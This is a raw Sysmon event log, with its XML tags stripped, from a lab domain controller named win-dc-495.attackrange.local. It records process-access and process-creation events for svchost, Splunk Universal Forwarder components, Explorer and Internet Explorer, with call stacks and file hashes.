13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013401Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:48.023{59A5CD1D-9418-6005-1805-00000000A301}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:49.882{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.882{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000013443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.742{59A5CD1D-9419-6005-1A05-00000000A301}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000013442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+141977|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1418e2|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09 10341000x800000000000000013435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.820{59A5CD1D-940F-6005-0C05-00000000A301}64766560C:\Program Files\Internet 
Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+1418c7|C:\Windows\System32\windows.storage.dll+1412a3|C:\Windows\System32\windows.storage.dll+141129|C:\Windows\System32\shcore.dll+3282b|C:\Windows\System32\shcore.dll+3278f|C:\Windows\SYSTEM32\IEFRAME.dll+1a6fd|C:\Windows\SYSTEM32\IEFRAME.dll+188bf|C:\Windows\SYSTEM32\IEFRAME.dll+3a601|C:\Windows\SYSTEM32\IEFRAME.dll+3ae25|C:\Windows\SYSTEM32\IEFRAME.dll+f9a06|C:\Windows\SYSTEM32\IEFRAME.dll+f93df|C:\Windows\SYSTEM32\IEFRAME.dll+f92e1|C:\Windows\SYSTEM32\IEFRAME.dll+f9104|C:\Windows\SYSTEM32\IEFRAME.dll+f9061|C:\Windows\SYSTEM32\IEFRAME.dll+3f8de|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a 10341000x800000000000000013434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:49.570{59A5CD1D-93FA-6005-FC04-00000000A301}37845292C:\Windows\Explorer.EXE{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
